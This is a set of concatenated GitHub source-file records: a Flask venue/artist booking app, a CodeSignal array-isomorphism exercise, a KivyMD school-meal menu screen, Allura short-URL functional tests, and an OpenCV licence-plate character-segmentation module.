methods=['POST'])\ndef edit_artist_submission(artist_id):\n\n form = ArtistForm(request.form)\n artist = db.session.query(Artist).filter(Artist.id == artist_id).one()\n\n error = False\n\n # Get updated data from form\n name = request.form['name']\n city = request.form['city']\n state = request.form['state']\n phone = request.form['phone']\n genres = request.form.getlist('genres')\n image_link = request.form['image_link']\n facebook_link = request.form['facebook_link']\n website = request.form['website']\n seeking_venue = True if 'seeking_venue' in request.form else False\n seeking_description = request.form['seeking_description']\n\n try:\n # get artist by ID\n artist = Artist.query.get(artist_id)\n\n # store updated data in variables\n artist.name = name\n artist.city = city\n artist.state = state\n artist.phone = phone\n artist.genres = genres\n artist.image_link = image_link\n artist.facebook_link = facebook_link\n artist.website = website\n artist.seeking_venue = seeking_venue\n artist.seeking_description = seeking_description\n\n # commit changes to the DB\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n\n # Show banner\n if error:\n flash('An error occurred. Artist '+ name + ' could not be updated.','danger'\n )\n else:\n flash('Artist '+ name + ' was successfully updated!', 'success'\n )\n\n return redirect(url_for('show_artist', artist_id=artist_id))\n\n\n# Create Artist\n# ----------------------------------------------------------------\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n # called upon submitting the new artist listing form\n response = {}\n error = False\n try:\n name = request.form.get(\"name\")\n city = request.form.get(\"city\")\n state = request.form.get(\"state\")\n phone = request.form.get(\"phone\")\n image_link = request.form.get('image_link')\n website = request.form.get('website')\n facebook_link = request.form.get(\"facebook_link\")\n genres = request.form.getlist(\"genres\")\n # Created an if statement to accept True/False (wasn't working otherwise)\n seeking_venue = True if 'seeking_venue' in request.form else False \n seeking_description = request.form['seeking_description']\n artist = Artist(\n name=name,\n city=city,\n state=state,\n phone=phone,\n image_link=image_link,\n genres=genres,\n website=website,\n facebook_link=facebook_link,\n seeking_venue=seeking_venue,\n seeking_description=seeking_description\n )\n response[\"name\"] = artist.name\n db.session.add(artist)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error == False:\n # on successful db insert, flash success\n flash('Artist ' + request.form['name'] + ' was successfully listed!')\n else:\n flash(\"An error occurred. 
Artist \" + request.form[\"name\"] + \" could not be listed.\")\n print(sys.exc_info())\n\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n@app.route('/shows')\ndef shows():\n # displays list of shows at /shows - done\n #Query shows database and do a join with Venue and Artist\n \n get_shows = db.session.query(Show).join(Venue).join(Artist).all()\n data = []\n # probably use a for loop to display all information from shows.html.\n for show in get_shows:\n data.append({\n \"venue_id\": show.venue_id,\n \"venue_name\": show.venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": show.artist.name, \n \"artist_image_link\": show.artist.image_link,\n \"start_time\": show.start_time.strftime('%Y-%m-%d %H:%M:%S')\n })\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing form\n error = False\n try: \n artist_id = request.form['artist_id']\n venue_id = request.form['venue_id']\n start_time = request.form['start_time']\n\n print(request.form)\n\n show = Show(artist_id=artist_id, venue_id=venue_id, start_time=start_time)\n db.session.add(show)\n db.session.commit()\n except: \n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally: \n db.session.close()\n if error: \n flash('An error occurred. Show could not be listed.')\n if not error: \n flash('Show was successfully listed')\n return render_template('pages/home.html')\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","repo_name":"tonyrizzotto/fyyurproject","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":20532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36465121805","text":"#\n# * Core 99, Are Isomorphic\n# * Medium\n\n# * Two two-dimensional arrays are isomorphic if they have the same number of \n# * rows and each pair of respective rows contains the same number of elements.\n\n# Given two two-dimensional arrays, check if they are isomorphic.\n\n# Example\n\n# For\n\n# array1 = [[1, 1, 1],\n# [0, 0]]\n\n# and\n\n# array2 = [[2, 1, 1],\n# [2, 1]]\n\n# the output should be\n# areIsomorphic(array1, array2) = true;\n\n# For\n\n# array1 = [[2],\n# []]\n\n# and\n\n# array2 = [[2]]\n\n# the output should be\n# areIsomorphic(array1, array2) = false.\n\n# Input/Output\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] array.array.integer array1\n\n# Guaranteed constraints:\n# 1 ≤ array1.length ≤ 5,\n# 0 ≤ array1[i].length ≤ 5,\n# 0 ≤ array1[i][j] ≤ 50.\n\n# [input] array.array.integer array2\n\n# Guaranteed constraints:\n# 1 ≤ array2.length ≤ 5,\n# 0 ≤ array2[i].length ≤ 5,\n# 0 ≤ array2[i][j] ≤ 50.\n\n# [output] boolean\n\n#%%\n\n# * Solution 1\ndef areIsomorphic(array1:list, array2:list)-> bool:\n n1 = len(array1)\n n2 = len(array2)\n if n1 != n2:\n return False\n for i in range(n1):\n if len(array1[i]) != len(array2[i]):\n return False\n\n return True\n\n\n# * Solution 2\ndef areIsomorphic2(array1:list, array2:list)-> bool:\n return (len(array1) == len(array2)) and all([len(array1[i]) == len(array2[i]) for i in range(len(array1))])\n\n\n# * Solution 3\ndef areIsomorphic3(array1:list, array2:list)-> bool:\n return list(map(len, array1)) == list(map(len, array2))\n\n\na1 = [[1,1,1],[0,0]]\na2 = [[2,1,1],[2,1]]\nr1 = areIsomorphic3(a1, a2)\nprint(r1)\n\na1 = [[2],[0,0]]\na2 = [[2],[1]]\nr1 = areIsomorphic3(a1, a2)\nprint(r1)\n\na1 = [[2],[0,0]]\na2 = [[2]]\nr1 = areIsomorphic3(a1, a2)\nprint(r1)","repo_name":"Vagacoder/Codesignal","sub_path":"python/Arcade/Core/C99AreIsomorphic.py","file_name":"C99AreIsomorphic.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"25079118301","text":"#= main_screen =>\nfrom kivymd.app import MDApp\nfrom kivy.clock import Clock, mainthread\nfrom kivy.properties import ObjectProperty, NumericProperty\nfrom kivymd.uix.screen import MDScreen\n\nfrom datetime import datetime, timedelta\nimport threading\n\nfrom database_helpers import get_from_database\nfrom waiter.dataclasses import eAsistentMeal\nfrom waiter.helpers import get_selected, get_monday\n\n\nclass MainScreen(MDScreen):\n \"\"\"Main Screen Class\"\"\"\n date_of_menu = ObjectProperty() # DateTime | displayed date\n meals_back_week = ObjectProperty() # Array | meals for the previous week\n meals_curr_week = ObjectProperty() # Array | meals for the current week\n meals_next_week = ObjectProperty() # Array | meals for the following week\n curr_week_num = NumericProperty() # Integer | num of current week\n\n def __init__(self, **kwargs):\n \"\"\"When Component Initialized\"\"\"\n super().__init__(**kwargs)\n app = MDApp.get_running_app()\n date_today = datetime.now()\n\n self.date_of_menu = date_today\n if self.date_of_menu.strftime(\"%w\") == \"6\": # if day is saturday (no meals)\n self.date_of_menu += timedelta(days=2)\n elif self.date_of_menu.strftime(\"%w\") == \"0\": # if day is sunday (no meals)\n self.date_of_menu += timedelta(days=1)\n\n loading_card = [\n {\n \"text\": \"Loading\",\n \"secondary_text\": \"\",\n \"icon\": \"all-inclusive\",\n \"meal_id\": \"000000\",\n \"selected\": False,\n }\n ]\n self.meals_curr_week = [loading_card for i in range(5)]\n self.create_cards()\n\n if app.logged_in:\n threading.Thread(target=self.get_weekly_data).start()\n\n def on_enter(self):\n \"\"\"When Entering Screen\"\"\"\n app = MDApp.get_running_app()\n if not app.logged_in:\n app.show_dialog(\"Error\", \"Please login!\")\n return\n\n def clear_screen(self):\n \"\"\"Clears Screen\"\"\"\n self.meals_curr_week = [[] for i in range(5)]\n self.meals_back_week = [[] for i in range(5)]\n self.meals_next_week = [[] for i in range(5)]\n self.create_cards()\n\n def get_weekly_data(self):\n \"\"\"Prepares Shown Data\"\"\"\n app = MDApp.get_running_app()\n week_num = int(\n str((get_monday(self.date_of_menu) - app.first_week_school) / 7).split(\" \")[0]\n )\n monday = get_monday(self.date_of_menu)\n\n curr_meals = app.waiter.api.get_meal_data(\n week_num, monday, app.meals\n )\n self.meals_curr_week = self.get_meals(curr_meals)\n next_meals = app.waiter.api.get_meal_data(\n week_num + 1, monday + timedelta(days=7), app.meals\n )\n self.meals_next_week = self.get_meals(next_meals)\n back_meals = app.waiter.api.get_meal_data(\n week_num - 1, monday - timedelta(days=7), app.meals\n )\n self.meals_back_week = self.get_meals(back_meals)\n\n def set_date(*args):\n app.root.ids.main.ids.date_label.text = str(\n self.date_of_menu.strftime(\"%d. %b. 
%y\")\n )\n Clock.schedule_once(set_date)\n self.create_cards()\n\n def get_meals(self, meals):\n \"\"\"Reformats Fetched Data\"\"\"\n app = MDApp.get_running_app()\n selected_meals = get_selected(meals)\n week_meals = []\n for i in range(5): # each day\n day_meals = []\n tracker = 1\n for meal in meals[i]: # each meal\n if not meal.meal_text:\n no_data = {\n \"text\": \"No Data\",\n \"secondary_text\": \"\",\n \"icon\": \"alert-circle-outline\",\n \"meal_id\": \"000000\",\n \"selected\": False,\n \"changable\": False,\n }\n day_meals = [no_data]\n break\n meal_data = {\n \"text\": meal.meal_text,\n \"secondary_text\": f\"meni {tracker}\",\n \"icon\": app.meals[meal.meal_id],\n \"selected\": meal.selected,\n \"meal_id\": meal.meal_id,\n \"changable\": meal.changable,\n }\n day_meals.append(meal_data)\n tracker += 1\n week_meals.append(day_meals)\n\n return week_meals\n\n @mainthread\n def create_cards(self):\n \"\"\"Populates RecycleView\"\"\"\n self.ids.recycle_view.data = self.meals_curr_week[\n int(self.date_of_menu.strftime(\"%w\")) - 1\n ]\n\n def set_next_week(self, date, *args):\n \"\"\"Switches Weeks\"\"\"\n app = MDApp.get_running_app()\n week_num = int(str((get_monday(date) - app.first_week_school) / 7).split(\" \")[0])\n next_meals = app.waiter.api.get_meal_data(week_num, get_monday(date), app.meals)\n self.meals_next_week = self.get_meals(next_meals)\n\n def set_prev_week(self, date, *args):\n \"\"\"Switches Weeks\"\"\"\n app = MDApp.get_running_app()\n week_num = int(str((get_monday(date) - app.first_week_school) / 7).split(\" \")[0])\n back_meals = app.waiter.api.get_meal_data(week_num, get_monday(date), app.meals)\n self.meals_back_week = self.get_meals(back_meals)\n\n def date_forward(self):\n \"\"\"Toggles Date Forwards\"\"\"\n \"\"\"\n if friday => switches weeks\n if weekend => sets date to next monday\n \"\"\"\n app = MDApp.get_running_app()\n if self.date_of_menu.strftime(\"%w\") == \"5\":\n self.meals_back_week = self.meals_curr_week\n self.meals_curr_week = self.meals_next_week\n threading.Thread(\n target=self.set_next_week, args=(self.date_of_menu + timedelta(days=8),)\n ).start()\n\n self.date_of_menu += timedelta(days=1)\n if self.date_of_menu.strftime(\"%w\") == \"6\":\n self.date_of_menu += timedelta(days=2)\n elif self.date_of_menu.strftime(\"%w\") == \"0\":\n self.date_of_menu += timedelta(days=1)\n app.root.ids.main.ids.date_label.text = str(\n self.date_of_menu.strftime(\"%d. %b. %y\")\n )\n self.create_cards()\n\n def date_backward(self):\n \"\"\"Toggles Date Backwards\"\"\"\n \"\"\"\n if monday => switches weeks\n if weekend => sets date to last friday\n \"\"\"\n app = MDApp.get_running_app()\n if self.date_of_menu.strftime(\"%w\") == \"1\":\n self.meals_next_week = self.meals_curr_week\n self.meals_curr_week = self.meals_back_week\n threading.Thread(\n target=self.set_prev_week,\n args=(self.date_of_menu - timedelta(days=10),),\n ).start()\n\n self.date_of_menu -= timedelta(days=1)\n if self.date_of_menu.strftime(\"%w\") == \"6\":\n self.date_of_menu -= timedelta(days=1)\n elif self.date_of_menu.strftime(\"%w\") == \"0\":\n self.date_of_menu -= timedelta(days=2)\n app.root.ids.main.ids.date_label.text = str(\n self.date_of_menu.strftime(\"%d. %b. %y\")\n )\n self.create_cards()\n","repo_name":"5KRC1/eAmenu","sub_path":"libs/screens/main_screen/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"2906061622","text":"import pylons\npylons.c = pylons.tmpl_context\nfrom pylons import c\nfrom allura.tests import decorators as td\nfrom alluratest.controller import TestController\n\nfrom forgeshorturl.model import ShortUrl\n\n\nclass TestRootController(TestController):\n def setUp(self):\n super(TestRootController, self).setUp()\n self.setup_with_tools()\n\n @td.with_url\n def setup_with_tools(self):\n pass\n\n def test_shorturl_add(self):\n response = self.app.get('/admin/url/add')\n response.form['short_url'] = 'test'\n response.form['full_url'] = 'http://www.google.com/'\n response.form.submit()\n redirected = self.app.get('/url/test').follow()\n assert redirected.request.url == 'http://www.google.com/'\n\n def test_shorturl_update(self):\n response = self.app.get('/admin/url/add')\n response.form['short_url'] = 'g'\n response.form['full_url'] = 'http://www.google.com/'\n response.form.submit()\n redirected = self.app.get('/url/g').follow()\n assert redirected.request.url == 'http://www.google.com/'\n\n response = self.app.get('/url/')\n form = response.forms['update-short-url-form']\n form['short_url'] = 'g'\n form['full_url'] = 'http://www.yahoo.com/'\n form.action = '/admin/url/add/'\n form.submit()\n redirected = self.app.get('/url/g').follow()\n assert redirected.request.url == 'http://www.yahoo.com/'\n\n def test_shorturl_not_found(self):\n self.app.post('/admin/url/add',\n dict(short_url='test',\n full_url='http://www.google.com/',\n description=\"description2\"))\n r = self.app.get('/url/test2', status=404)\n r = self.app.get('/url/')\n assert 'http://www.google.com/' in r\n\n def test_shorturl_private(self):\n self.app.post('/admin/url/add',\n dict(short_url='test_private',\n full_url='http://www.amazone.com/',\n private='on',\n description=\"description1\"))\n r = self.app.get('/url/')\n assert 'http://www.amazone.com/' in r\n assert 'yes ' in r\n self.app.get('/url/test_private',\n extra_environ=dict(username='*anonymous'),\n status=404)\n self.app.get('/url/test_private',\n status=302)\n\n def test_shorturl_errors(self):\n d = dict(short_url='amazone',\n full_url='amazone')\n r = self.app.post('/admin/url/add', params=d)\n assert 'error' in self.webflash(r)\n d = dict(short_url='test', full_url='http://google.com/')\n r = self.app.post('/admin/url/add', params=d)\n d['full_url'] = 'http://yahoo.com'\n r = self.app.post('/admin/url/add', params=d)\n assert 'exists' in self.webflash(r)\n\n def test_shorturl_remove(self):\n self.app.post('/admin/url/add',\n params=dict(short_url='g', full_url='http://google.com/'))\n assert ShortUrl.query.find(app_config_id=c.app.config._id).count() == 1\n self.app.post('/admin/url/remove', params=dict(shorturl='g'))\n assert ShortUrl.query.find(app_config_id=c.app.config._id).count() == 0\n\n def test_shorturl_permissions(self):\n self.app.post('/admin/url/add',\n params=dict(short_url='g', full_url='http://google.com/'),\n extra_environ=dict(username='test-user'), status=403)\n self.app.post('/admin/url/remove', params=dict(shorturl='g'),\n extra_environ=dict(username='test-user'), status=403)\n","repo_name":"Bitergia/allura","sub_path":"ForgeShortUrl/forgeshorturl/tests/functional/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"11119799083","text":"import cv2\nimport numpy as np\nimport scipy.fftpack\n\ndef percentage_pixel(img):\n\twhite = np.sum(img == 255)\n\tblack = np.sum(img == 0)\n\treturn (white/(white + black)) * 100\n\t\n# Color identification of the number plate using K means clustering\ndef get_color(img):\n\thsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n\n\tmaskyellow = cv2.inRange(hsv, np.array([20,100,100],dtype = np.uint8), np.array([30,255,255], dtype = np.uint8))\n\tperyellow = percentage_pixel(maskyellow)\n\n\tmaskwhite = cv2.inRange(hsv, np.array([0,0,168],dtype = np.uint8), np.array([172,111,255], dtype = np.uint8))\n\tperwhite = percentage_pixel(maskwhite)\n\n\tnumberplate = {peryellow:'COMMERICIAL',perwhite:'PRIVATE'}\n\n\tif max(perwhite,peryellow) < 30:\n\t\treturn 'OTHER'\n\telse:\n\t\treturn sorted(numberplate.items(), key = lambda x: x[0], reverse = True)[0][1]\n\ndef rotate(olist, rot):\n\tolistnew = []\n\tfor element in olist:\n\t\tx,y,c = element[0], element[1], element[2]\n\t\ttemplist = np.array([[element[0]], [element[1]]])\n\t\ttemplist = np.matmul(rot, templist)\n\t\tx = templist[0][0]\n\t\ty = templist[1][0]\n\t\tolistnew = olistnew + [(x,y,c)]\n\treturn olistnew\n\ndef findstring(elements, threshold):\n\telements.sort(key = lambda x: x[1])\n\tupper = ''\n\tlower = ''\n\tsd = 0\n\tif abs(elements[0][1] - elements[-1][1]) < threshold:\n\t\tprint('Single Line Case')\n\t\tsd = 0\n\telse:\n\t\tprint('Double Line Case')\n\t\tsd = 1\n\tif sd == 0:\n\t\telements.sort(key = lambda x: x[0])\n\t\tfor element in elements:\n\t\t\tupper = upper + element[2]\n\t\treturn upper\n\telse:\n\t\tav = (elements[0][1] + elements[-1][1])/2\n\t\telements.sort(key = lambda x: x[0])\n\t\t\n\t\t#print(av)\n\t\t#print(elements)\n\t\tfor element in elements:\n\t\t\t#print(element[1])\n\t\t\tif element[1] < av:\n\t\t\t\tupper = upper + element[2]\n\t\t\telse:\n\t\t\t\tlower = lower + element[2]\n\t\treturn upper + lower\n\ndef plate_to_string(x_c, y_c, line, line_thresh):\n\tolist = list(zip(x_c, y_c, line))\n\tolist.sort(key = lambda x:x[0])\n\tif len(olist) > 1:\n\t\tif olist[0][1] < olist[1][1]:\n\t\t\tx_1 = olist[1][0]\n\t\t\ty_1 = olist[1][1]\n\t\telse:\n\t\t\tx_1 = olist[0][0]\n\t\t\ty_1 = olist[0][1]\n\t\tif olist[-1][1] < olist[-2][1]:\n\t\t\tx_2 = olist[-2][0]\n\t\t\ty_2 = olist[-2][1]\n\t\telse:\n\t\t\tx_2 = olist[-1][0]\n\t\t\ty_2 = olist[-1][1]\n\t\tif x_2 - x_1 != 0:\t\n\t\t\ttheta = np.arctan((y_1 - y_2)/(x_2 - x_1))\n\t\t\trot = np.array([[np.cos(theta), -np.sin(theta)],[np.sin(theta), np.cos(theta)]])\n\t\t\tolistnew = rotate(olist, rot)\n\t\t\tolistnew.sort(key = lambda x: x[0])\n\t\t\tplate = findstring(olistnew, threshold = line_thresh)\n\t\t\tprint('Plate = ',plate)\n\t\t\treturn plate\n\t\telse:\n\t\t\treturn \" \"\n\telse:\n\t\treturn \" \"\n\ndef padder(h,w,im):\n\tblack = np.zeros((h,w,3),dtype=np.uint8)\n\tim_h,im_w = im.shape[0] , im.shape[1]\n\tblack[:im_h,:im_w,:] = im\n\treturn black\n\ndef imclearborder(imgBW, radius):\n\n # Given a black and white image, first find all of its contours\n imgBWcopy = imgBW.copy()\n if (int(cv2.__version__[0]) < 4):\n im,contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n else:\n contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE) \n \n\n # Get dimensions of image\n imgRows = imgBW.shape[0]\n imgCols = imgBW.shape[1] \n\n contourList = [] # ID list of contours that touch the border\n\n # For each contour...\n for idx in np.arange(len(contours)):\n 
# Get the i'th contour\n cnt = contours[idx]\n\n # Look at each point in the contour\n for pt in cnt:\n rowCnt = pt[0][1]\n colCnt = pt[0][0]\n\n # If this is within the radius of the border\n # this contour goes bye bye!\n check1 = (rowCnt >= 0 and rowCnt < radius) or (rowCnt >= imgRows-1-radius and rowCnt < imgRows)\n check2 = (colCnt >= 0 and colCnt < radius) or (colCnt >= imgCols-1-radius and colCnt < imgCols)\n\n if check1 or check2:\n contourList.append(idx)\n break\n\n for idx in contourList:\n cv2.drawContours(imgBWcopy, contours, idx, (0,0,0), -1)\n\n return imgBWcopy\n\n\ndef bwareaopen(imgBW, areaPixels):\n # Given a black and white image, first find all of its contours\n imgBWcopy = imgBW.copy()\n\n if (int(cv2.__version__[0]) < 4):\t\n im,contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n else:\n contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n \n\n # For each contour, determine its total occupying area\n for idx in np.arange(len(contours)):\n area = cv2.contourArea(contours[idx])\n if (area >= 0 and area <= areaPixels):\n cv2.drawContours(imgBWcopy, contours, idx, (0,0,0), -1)\n\n return imgBWcopy\n\n\n\ndef find_boxes(thresh, drawplates, maxareathresh, minareathresh):\n\ttotal, labels, boxes, centroids = cv2.connectedComponentsWithStats(thresh, 8, cv2.CV_32S)\n\tif total > 1:\n\t\tif drawplates:\n\t\t\tthresh = cv2.cvtColor(thresh, cv2.COLOR_GRAY2BGR)\n\t\tcc = []\n\t\tcentroid = []\n\t\ti = 0\n\t\twhile(i < total):\n\t\t\tx1 = int(boxes[i][0])\n\t\t\ty1 = int(boxes[i][1])\n\t\t\tx2 = x1 + int(boxes[i][2])\n\t\t\ty2 = y1 + int(boxes[i][3])\n\t\t\tif boxes[i][4] < maxareathresh and minareathresh < boxes[i][4]:\n\t\t\t\t#cc = np.append(cc, np.array([[x1,y1,x2,y2]]), axis = 0)\n\t\t\t\tcc = cc + [thresh[y1:y2,x1:x2]]\n\t\t\t\tcentroid = centroid + [(x1 + x2)/2]\n\t\t\t\tif drawplates:\n\t\t\t\t\tcv2.rectangle(thresh, (x1, y1), (x2, y2), (0,0,255), 1)\t\n\t\t\ti = i + 1\n\t\tidx = np.argsort(centroid)\n\t\tcc = np.array(cc)[idx]\n\t\t#centroid = np.array(centroid)[idx]\n\t\treturn thresh, cc\n\telse:\n\t\treturn thresh, np.empty((0,4))\n\ndef find_coordinates(img, boxes):\n width = img.shape[1]\n height = img.shape[0]\n \n for i in range(len(boxes)):\n box = boxes[i]\n x1 = abs(int((box[0] - box[2] / 2.0) * width))\n y1 = abs(int((box[1] - box[3] / 2.0) * height))\n x2 = int((box[0] + box[2] / 2.0) * width)\n y2 = int((box[1] + box[3] / 2.0) * height)\n return x1, y1, x2, y2\n\n\ndef order_points(pts):\n\n\trect = np.zeros((4, 2), dtype = \"float32\")\n\n\ts = pts.sum(axis = 1)\n\trect[0] = pts[np.argmin(s)]\n\trect[2] = pts[np.argmax(s)]\n \n\n\tdiff = np.diff(pts, axis = 1)\n\trect[1] = pts[np.argmin(diff)]\n\trect[3] = pts[np.argmax(diff)]\n \n\t# return the ordered coordinates\n\treturn rect\n\n\ndef four_point_transform(image, pts):\n\n\trect = order_points(pts)\n\t(tl, tr, br, bl) = rect\n\n\twidthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n\twidthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n\tmaxWidth = max(int(widthA), int(widthB))\n \n\n\theightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n\theightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n\tmaxHeight = max(int(heightA), int(heightB))\n\n\tdst = np.array([\n\t\t[0, 0],\n\t\t[maxWidth - 1, 0],\n\t\t[maxWidth - 1, maxHeight - 1],\n\t\t[0, maxHeight - 1]], dtype = \"float32\")\n \n\t# compute the perspective transform matrix and then apply it\n\tM = 
cv2.getPerspectiveTransform(rect, dst)\n\twarped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n \n\t# return the warped image\n\treturn warped\n\n\n\ndef plate_detect(frame, boxes, drawplates, maxareathresh, minareathresh):\n\trf = 1\n\t#kernel = np.ones((5,5),np.uint8)\n\tkernel = np.array([[1,2,1],[2,4,2],[1,2,1]], dtype = np.uint8)/16\n\n\tx1, y1, x2, y2 = find_coordinates(frame, boxes)\n\tif x1 == 0 and x2 == 0 and y1 == 0 and y2 == 0:\n\t\tx2, y2 = 1, 1\n\t\n\timg = frame[y1:y2,x1:x2]\n\talphanumerics = []\n\tIclear = np.zeros((10,10))\n\tIopen = np.zeros((10,10))\n\timggray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\t#clahe = cv2.createCLAHE(clipLimit = 2.0, tileGridSize = (8,8))\n\tsh = imggray.shape\n\n\t#original = cv2.resize(original,(sh[1],sh[0]))\n\t#Image enhancement using morphological transformation\n\tret,thresh = cv2.threshold(imggray,60,255,0)\n\tthresh = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel)\n\n\t#Contour detection for detecting the number plate area\n\tif (int(cv2.__version__[0]) < 4):\n\t\tx, contours, hierarchy = cv2.findContours(thresh, 1, 2)\n\telse:\n\t\tcontours, hierarchy = cv2.findContours(thresh, 1, 2)\n\t\t\n\tif len(contours) >0:\n\n\t\tc = max(contours, key=cv2.contourArea)\n\t\textLeft = tuple(c[c[:, :, 0].argmin()][0])\n\t\textRight = tuple(c[c[:, :, 0].argmax()][0])\n\t\textTop = tuple(c[c[:, :, 1].argmin()][0])\n\t\textBot = tuple(c[c[:, :, 1].argmax()][0])\n\t\trect = cv2.minAreaRect(c)\n\t\tpts11 = cv2.boxPoints(rect)\n\t\tbox = np.int0(pts11)*rf\n\t\tp1,p2,p3,p4 = box\n\n\t\tpts = np.array([p1, p2, p3, p4], dtype = \"float32\")\n\n\n\t\tplate = four_point_transform(img,pts)\n\t\t\n\t\timgg = cv2.cvtColor(plate, cv2.COLOR_BGR2GRAY)\n\t\t\n\t\trows = imgg.shape[0]\n\t\tcols = imgg.shape[1]\n\t\t\n\t\timgLog = np.log1p(np.array(imgg, dtype=\"float\") / 255)\n\n\t\t# Create Gaussian mask of sigma = 10\n\t\tM = 2*rows + 1\n\t\tN = 2*cols + 1\n\t\tsigma = 5\n\t\t(X,Y) = np.meshgrid(np.linspace(0,N-1,N), np.linspace(0,M-1,M))\n\t\tcenterX = np.ceil(N/2)\n\t\tcenterY = np.ceil(M/2)\n\t\tgaussianNumerator = (X - centerX)**2 + (Y - centerY)**2\n\n\t\t# Low pass and high pass filters\n\t\tHlow = np.exp(-gaussianNumerator / (2*sigma*sigma))\n\t\tHhigh = 1 - Hlow\n\n\t\t# Move origin of filters so that it's at the top left corner to\n\t\t# match with the input image\n\t\tHlowShift = scipy.fftpack.ifftshift(Hlow.copy())\n\t\tHhighShift = scipy.fftpack.ifftshift(Hhigh.copy())\n\n\t\t# Filter the image and crop\n\t\tIf = scipy.fftpack.fft2(imgLog.copy(), (M,N))\n\t\tIoutlow = scipy.real(scipy.fftpack.ifft2(If.copy() * HlowShift, (M,N)))\n\t\tIouthigh = scipy.real(scipy.fftpack.ifft2(If.copy() * HhighShift, (M,N)))\n\n\t\t# Set scaling factors and add\n\n\t\tgamma1 = 0.3 #0.3\n\t\tgamma2 = 1.5 #1.5\n\t\tIout = gamma1*Ioutlow[0:rows,0:cols] + gamma2*Iouthigh[0:rows,0:cols]\n\n\t\t# Anti-log then rescale to [0,1]\n\t\tIhmf = np.expm1(Iout)\n\t\tIhmf = (Ihmf - np.min(Ihmf)) / (np.max(Ihmf) - np.min(Ihmf))\n\t\tIhmf2 = np.array(255*Ihmf, dtype=\"uint8\")\n\n\t\t# Threshold the image - Anything below intensity 65 gets set to white\n\t\tIthresh = Ihmf2 < 80\n\t\tIthresh = 255*Ithresh.astype(\"uint8\")\n\n\t\t# Clear off the border. 
Choose a border radius of 5 pixels\n\t\tIclear = imclearborder(Ithresh, 5) #5\n\t\t#cv2.imshow('Cleaned Plate',Iclear)\n\t\t#Iclear = Ithresh\n\t\t# Eliminate regions that have areas below 40 pixels\n\n\t\tthresh = bwareaopen(Iclear, 40) #60\n\t\t\n\t\t#ret, thresh = cv2.threshold(imgg, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n\t\t#thresh = cv2.medianBlur(thresh, 3)\n\t\t#thresh = cv2.bilateralFilter(thresh, 15, 75, 75)\n\t\t\n\t\tthresh, digitbox = find_boxes(thresh, drawplates, maxareathresh, minareathresh)\n\t\t\n\n\treturn thresh, digitbox\n\t\n#cap = cv2.VideoCapture('/home/arihant/Downloads/1.mp4')\n\n#locfile = open('/home/arihant/sih_number_plate-master1/locations.txt','r')\n\n#coor = locfile.readline()\n\n","repo_name":"conspicio-ai/alpr","sub_path":"pytorch-YOLOv4/tool/plateprocessing.py","file_name":"plateprocessing.py","file_ext":"py","file_size_in_byte":10555,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"}
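A small usage sketch for the four_point_transform helper defined in the record above; the synthetic image and corner coordinates are invented for illustration, and numpy plus OpenCV are assumed installed.

import numpy as np

img = np.zeros((200, 200, 3), dtype=np.uint8)
img[50:150, 40:160] = 255  # a white patch to crop out and rectify
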